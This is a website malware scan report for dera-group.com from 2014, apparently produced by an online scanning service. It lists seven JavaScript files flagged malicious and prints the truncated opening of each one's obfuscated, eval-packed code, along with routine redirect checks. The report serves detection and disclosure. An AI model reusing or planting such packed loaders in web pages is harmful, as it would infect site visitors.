Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dera-group.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dera-group.com/ | 200 OK Content-Length: 8330 Content-Type: text/html | clean |
http://dera-group.com/_src/pl.js | 200 OK Content-Length: 27455 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z O(f){w.3U=z(a,b){v c=\'\';2I(v i=0;i<b.J;i++){c+=K.M(a.1b(i%a.J)^b.1b(i))}G c};w.S=z(h){F(h.B(\':\'))h=h.W(\':\')[0];v a=h.W(\'.\');1a(a.J>2){a.2H()}G a.2G(\'.\ Antivirus reports:
| ||
http://dera-group.com/_src/m.js | 200 OK Content-Length: 12494 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B O(f){v.1v=B(a,b){p c=\'\';1u(p i=0;i<b.J;i++){c+=I.H(a.W(i%a.J)^b.W(i))}G c};v.T=B(h){F(h.z(\':\'))h=h.V(\':\')[0];p a=h.V(\'.\');S(a.J>2){a.2G()}G a.1s(\'.\')} Antivirus reports:
| ||
http://dera-group.com/_src/mu.js | 200 OK Content-Length: 12375 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C O(f){q.2O=C(a,b){p c=\'\';2L(p i=0;i<b.F;i++){c+=H.J(a.S(i%a.F)^b.S(i))}K c};q.W=C(h){L(h.D(\':\'))h=h.P(\':\')[0];p a=h.P(\'.\');R(a.F>2){a.2K()}K a.2J(\'.\')} Antivirus reports:
| ||
http://dera-group.com/_src/j.js | 200 OK Content-Length: 12412 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z O(f){w.2O=z(a,b){v c=\'\';2L(v i=0;i<b.K;i++){c+=L.J(a.T(i%a.K)^b.T(i))}G c};w.W=z(h){I(h.B(\':\'))h=h.19(\':\')[0];v a=h.19(\'.\');S(a.K>2){a.2K()}G a.2J(\'.\' Antivirus reports:
| ||
http://dera-group.com/_src/t.js | 200 OK Content-Length: 12450 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B R(f){x.2L=B(a,b){w c=\'\';2I(w i=0;i<b.L;i++){c+=K.I(a.T(i%a.L)^b.T(i))}H c};x.W=B(h){J(h.C(\':\'))h=h.Z(\':\')[0];w a=h.Z(\'.\');S(a.L>2){a.2H()}H a.2G(\'.\')} Antivirus reports:
| ||
http://dera-group.com/_src/subwin.js | 200 OK Content-Length: 11653 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B O(f){w.1J=B(a,b){v c=\'\';1n(v i=0;i<b.F;i++){c+=H.I(a.T(i%a.F)^b.T(i))}K c};w.U=B(h){G(h.z(\':\'))h=h.V(\':\')[0];v a=h.V(\'.\');W(a.F>2){a.1g()}K a.1f(\'.\')} Antivirus reports:
| ||
http://dera-group.com/_src/togglebox.js | 200 OK Content-Length: 12917 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y Q(f){v.2L=y(a,b){q c=\'\';2G(q i=0;i<b.G;i++){c+=K.J(a.14(i%a.G)^b.14(i))}O c};v.T=y(h){N(h.z(\':\'))h=h.Y(\':\')[0];q a=h.Y(\'.\');Z(a.G>2){a.2F()}O a.2E(\'.\' Antivirus reports:
| ||
http://dera-group.com/index.asp | 200 OK Content-Length: 8330 Content-Type: text/html | clean |
http://dera-group.com/missionstatement.asp | 200 OK Content-Length: 4657 Content-Type: text/html | clean |
http://dera-group.com/briefhistory.asp | 200 OK Content-Length: 5060 Content-Type: text/html | clean |
http://dera-group.com/deragroup.asp | 200 OK Content-Length: 6799 Content-Type: text/html | clean |
http://dera-group.com/quality.asp | 200 OK Content-Length: 4980 Content-Type: text/html | clean |
http://dera-group.com/productsandservices.asp | 200 OK Content-Length: 6773 Content-Type: text/html | clean |
http://dera-group.com/jobsatdera.asp | 200 OK Content-Length: 7224 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dera-group.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 12:40:45 GMT
Server: Microsoft-IIS/6.0
Content-Length: 8330
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAQCTACB=PNKHKIAAMDKBDMMNKPOGLMGI; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...8330 bytes of data.
GET / HTTP/1.1
Host: dera-group.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 12:40:45 GMT
Server: Microsoft-IIS/6.0
Content-Length: 8330
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAQCTACB=PNKHKIAAMDKBDMMNKPOGLMGI; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...8330 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dera-group.com
Referer: http://www.google.com/search?q=dera-group.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dera-group.com
Referer: http://www.google.com/search?q=dera-group.com
Result:
The result is similar to the first query. There are no suspicious redirects found.